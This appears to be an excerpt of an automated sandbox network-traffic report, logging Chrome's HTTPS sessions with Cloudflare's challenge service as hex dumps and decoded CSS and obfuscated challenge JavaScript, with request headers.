                                                                                                                              Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                              Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d
                                                                                                                              Data Ascii: enge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69
                                                                                                                              Data Ascii: k .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop-li
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 7d 74 6f 7b 66 69 6c 6c 3a 23
                                                                                                                              Data Ascii: ffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1303}to{fill:#
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 6c 6f 67 6f 7b 68 65
                                                                                                                              Data Ascii: flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-compact #logo{he
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 73 74 61 72 74 3b 6a 75 73 74 69
                                                                                                                              Data Ascii: .rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justi
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c
                                                                                                                              Data Ascii: text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-l


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.1749730104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:49 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:49 UTC331INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:49 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 119644
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d878b794642-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:49 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32
                                                                                                                              Data Ascii: sh":"Refresh","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%2
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 4b 28 35 34 34 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 31 32 39 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 38 39 31 29 29 2f 38 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 31 38 35 31 29 29 2f 39 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 35 33 38 29 29 2f 31 30 29 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 36 32 35 29 29 2f 31 31 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 37 37 36 31 35 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 30 38 39 29 5d 2c 65 4d 5b 67 4c 28 31 34 32 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 59 2c 65 29 7b
                                                                                                                              Data Ascii: K(544))/6+parseInt(gK(1129))/7*(-parseInt(gK(891))/8)+parseInt(gK(1851))/9*(-parseInt(gK(1538))/10)+parseInt(gK(625))/11,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,677615),eM=this||self,eN=eM[gL(1089)],eM[gL(1428)]=function(c,gY,e){
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 3c 69 7d 2c 27 69 5a 52 56 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 73 73 43 67 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 47 48 45 76 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 68 70 4d 56 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 62 45 49 61 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 77 52 43 71 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 51 77 73 61 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 76 6f 78 63 6b 27 3a 66
                                                                                                                              Data Ascii: <i},'iZRVb':function(h,i){return h==i},'ssCgM':function(h,i){return h<<i},'GHEvo':function(h,i){return h-i},'hpMVZ':function(h,i){return i==h},'bEIae':function(h,i){return h<i},'wRCqd':function(h,i){return h==i},'QwsaQ':function(h,i){return h<i},'voxck':f
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 35 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 68 41 28 31 30 36 35 29 5d 5b 68 41 28 31 33 34 36 29 5d 5b 68 41 28 34 36 35 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 68 41 28 31 30 36 35 29 5d 5b 68 41 28 31 33 34 36 29 5d 5b 68 41 28 34 36 35 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 41 28 31 31 36 37 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 68 41 28 31 31 35 32 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 41 28 31 33 34 33 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 41 28 31 31 36 37 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68
                                                                                                                              Data Ascii: 5)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[hA(1065)][hA(1346)][hA(465)](x,L))C=L;else{if(Object[hA(1065)][hA(1346)][hA(465)](B,C)){if(256>C[hA(1167)](0)){for(s=0;s<F;H<<=1,d[hA(1152)](I,j-1)?(I=0,G[hA(1343)](o(H)),H=0):I++,s++);for(M=C[hA(1167)](0),s=0;d[h
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 68 41 28 37 30 38 29 5d 3d 64 5b 68 41 28 31 34 34 37 29 5d 2c 54 5b 68 41 28 31 38 32 39 29 5d 28 55 29 2c 56 3d 49 5b 68 41 28 31 33 34 32 29 5d 28 64 5b 68 41 28 31 30 33 32 29 5d 29 2c 56 5b 68 41 28 31 33 31 30 29 5d 3d 68 41 28 31 30 32 38 29 2c 54 5b 68 41 28 31 38 32 39 29 5d 28 56 29 2c 57 3d 4a 5b 68 41 28 31 33 34 32 29 5d 28 64 5b 68 41 28 31 30 33 32 29 5d 29 2c 57 5b 68 41 28 31 37 31 38 29 5d 3d 53 2c 57 5b 68 41 28 31 33 31 30 29 5d 3d 64 5b 68 41 28 31 38 31 39 29 5d 2c 54 5b 68 41 28 31 38 32 39 29 5d 28 57 29 2c 4b 5b 68 41 28 31 38 32 39 29 5d 28 54 29 2c 4c 28 29 5b 68 41 28 31 38 32 39 29 5d 28 4d 29 2c 55 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 41 28 31 36 31 36 29 5d 28 48 2c 31 29 7c 4d 2c
                                                                                                                              Data Ascii: hA(708)]=d[hA(1447)],T[hA(1829)](U),V=I[hA(1342)](d[hA(1032)]),V[hA(1310)]=hA(1028),T[hA(1829)](V),W=J[hA(1342)](d[hA(1032)]),W[hA(1718)]=S,W[hA(1310)]=d[hA(1819)],T[hA(1829)](W),K[hA(1829)](T),L()[hA(1829)](M),U}else{for(M=1,s=0;s<F;H=d[hA(1616)](H,1)|M,
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 68 5b 68 45 28 31 36 36 36 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 45 28 31 31 35 32 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 45 28 38 34 36 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 45 28 31 36 36 36 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 64 5b 68 45 28 31 38 33 30 29 5d 28 46 2c 4b 29 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74
                                                                                                                              Data Ascii: h[hE(1666)](2,8),F=1;K!=F;L=H&G,H>>=1,d[hE(1152)](0,H)&&(H=j,G=o(I++)),J|=(d[hE(846)](0,L)?1:0)*F,F<<=1);M=e(J);break;case 1:for(J=0,K=Math[hE(1666)](2,16),F=1;d[hE(1830)](F,K);L=G&H,H>>=1,H==0&&(H=j,G=o(I++)),J|=(0<L?1:0)*F,F<<=1);M=e(J);break;case 2:ret
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 6a 2c 69 63 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 69 66 28 69 63 3d 67 4c 2c 6f 3d 7b 27 6f 58 4e 71 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 70 4f 4d 71 58 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 4e 4e 64 69 45 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 46 6a 4a 41 65 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 71 75 56 73 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 56 69 70 6a 70 27 3a 69 63 28 31 35 30 39 29 2c 27 6b 67 6d 75 6c 27 3a 69 63 28 31 31 36 36 29 2c 27 62 50 74 65 78 27 3a 66 75 6e 63
                                                                                                                              Data Ascii: j,ic,o,x,B,C,D,E,F){if(ic=gL,o={'oXNql':function(G,H){return G<H},'pOMqX':function(G,H){return G===H},'NNdiE':function(G,H){return G===H},'FjJAe':function(G,H){return G(H)},'quVsO':function(G,H){return H===G},'Vipjp':ic(1509),'kgmul':ic(1166),'bPtex':func
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 31 32 30 34 29 5d 28 27 66 27 2c 6e 29 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6b 5b 69 67 28 31 35 31 37 29 5d 28 6f 2c 69 5b 6c 5b 6d 5d 5d 5b 69 67 28 31 31 30 30 29 5d 29 3b 6b 5b 69 67 28 31 38 35 39 29 5d 28 2d 31 2c 68 5b 6e 5d 5b 69 67 28 37 32 33 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 26 26 28 66 42 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 69 67 28 31 33 34 33 29 5d 28 27 6f 2e 27 2b 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 69 67 28 31 33 38 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 73 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 73 7d 29 7d 2c 65 4d 5b 67 4c 28 35 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 68 2c 64 2c 65 2c 66 2c
                                                                                                                              Data Ascii: 1204)]('f',n)&&(n='N'),h[n]){for(o=0;k[ig(1517)](o,i[l[m]][ig(1100)]);k[ig(1859)](-1,h[n][ig(723)](i[l[m]][o]))&&(fB(i[l[m]][o])||h[n][ig(1343)]('o.'+i[l[m]][o])),o++);}else h[n]=i[l[m]][ig(1387)](function(s){return'o.'+s})},eM[gL(565)]=function(ih,d,e,f,
                                                                                                                              2024-11-18 16:55:49 UTC1369INData Raw: 35 30 37 29 5d 5b 69 6a 28 37 32 32 29 5d 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 51 5b 69 6a 28 31 37 30 31 29 5d 26 26 28 4a 3d 7b 7d 2c 4a 5b 69 6a 28 31 39 31 39 29 5d 3d 69 5b 69 6a 28 31 38 38 32 29 5d 2c 4a 5b 69 6a 28 37 34 35 29 5d 3d 61 30 5b 69 6a 28 31 35 30 37 29 5d 5b 69 6a 28 38 39 33 29 5d 2c 4a 5b 69 6a 28 31 32 34 38 29 5d 3d 69 6a 28 31 33 33 36 29 2c 5a 5b 69 6a 28 31 37 30 31 29 5d 5b 69 6a 28 31 35 35 31 29 5d 28 4a 2c 27 2a 27 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 43 3d 21 21 5b 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 49 26 26 69 5b 69 6a 28 31 34 30 33 29 5d 28 54 2c 55 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 69 5b 69 6a 28 31 33 36 34 29 5d 28 46 29 3b 63
                                                                                                                              Data Ascii: 507)][ij(722)]));continue;case'2':Q[ij(1701)]&&(J={},J[ij(1919)]=i[ij(1882)],J[ij(745)]=a0[ij(1507)][ij(893)],J[ij(1248)]=ij(1336),Z[ij(1701)][ij(1551)](J,'*'));continue;case'3':C=!![];continue;case'4':I&&i[ij(1403)](T,U);continue;case'5':i[ij(1364)](F);c


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.1749731104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:49 UTC742OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
